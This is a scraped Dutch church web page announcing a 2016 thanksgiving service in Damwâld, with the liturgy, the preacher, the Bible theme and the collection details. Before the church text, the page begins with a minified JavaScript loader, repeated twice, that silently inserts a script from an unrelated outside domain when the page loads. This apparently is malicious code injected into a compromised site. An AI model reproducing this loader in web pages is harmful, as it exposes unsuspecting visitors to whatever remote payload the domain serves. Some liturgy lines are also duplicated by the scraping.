;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Dankstond Hervormd Akkerwoude c.a. - PKN Damwâld
woensdag 2 november 2016
19:30 uur

Dankstond Hervormd Akkerwoude c.a.

Thema: 1 Kronieken 29: 10-19

In de dienst om 19.30 uur sta ik stil bij het Bijbelgedeelte 1 Kronieken 29: 10-19. Alvast iets om over na te denken. “Vader geeft zijn zoontje iedere week zakgeld. Als zijn zoontje van dat zakgeld een cadeau koopt voor zijn vader, dan heeft vader toch eigenlijk zijn eigen cadeau betaald? Kan heit dan toch blij zijn met dit cadeau?” Ds. G. Timmervg_-01

Informatie

Voorganger:Ds. G. Timmer
Organist:Jaap van der Horn
Thema:1 Kronieken 29: 10-19
Liturgie
lied voor de dienst Gezang 44: 1, 2 en 3
Welkom en mededelingen
We zingen: Psalm 103 : 1
Stil gebed, bemoediging en groet Stil gebed, bemoediging en groet
We zingen: Gezang 479: 1, 2 , 3 en 4
Apostolische Geloofsbelijdenis Apostolische Geloofsbelijdenis
We zingen: ELB 161: 1 en 3
Gebed om de opening van het Woord Gebed om de opening van het Woord
We lezen: 1 Kronieken 29: 6-20
We zingen: Psalm 138: 1 en 2
Verkondiging: “Van God voor God” Verkondiging: “Van God voor God”
We zingen: ELB 396: 1, 2 en 3 + refrein
Dankgebed en voorbeden Dankgebed en voorbeden
Collecte
We zingen: Gezang 387: 1, 5, 6 en 7
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Dorcas voedselactie 2016

Dit jaar organiseert Dorcas voor de éénentwintigste keer de Dorcas Voedselactie: een actieweek waarin duizenden mensen zich vrijwillig inzetten voor voedsel en voedselzekerheid voor de allerarmsten in Oost-Europa en Afrika. De Dorcas Voedselactie vindt plaats rondom de Dankdag voor gewas en arbeid. Dorcas ziet Dankdag als een uitgelezen moment om stil te staan bij onze niet vanzelfsprekende welvaart en om onze dankbaarheid te tonen door om te zien naar de allerarmsten in de wereld. Dit staat ook in missietekst van Dorcas, Mattheüs 25:31-46.

Tweede collecte: Kerk
Uitganscollecte: Dankstond collecte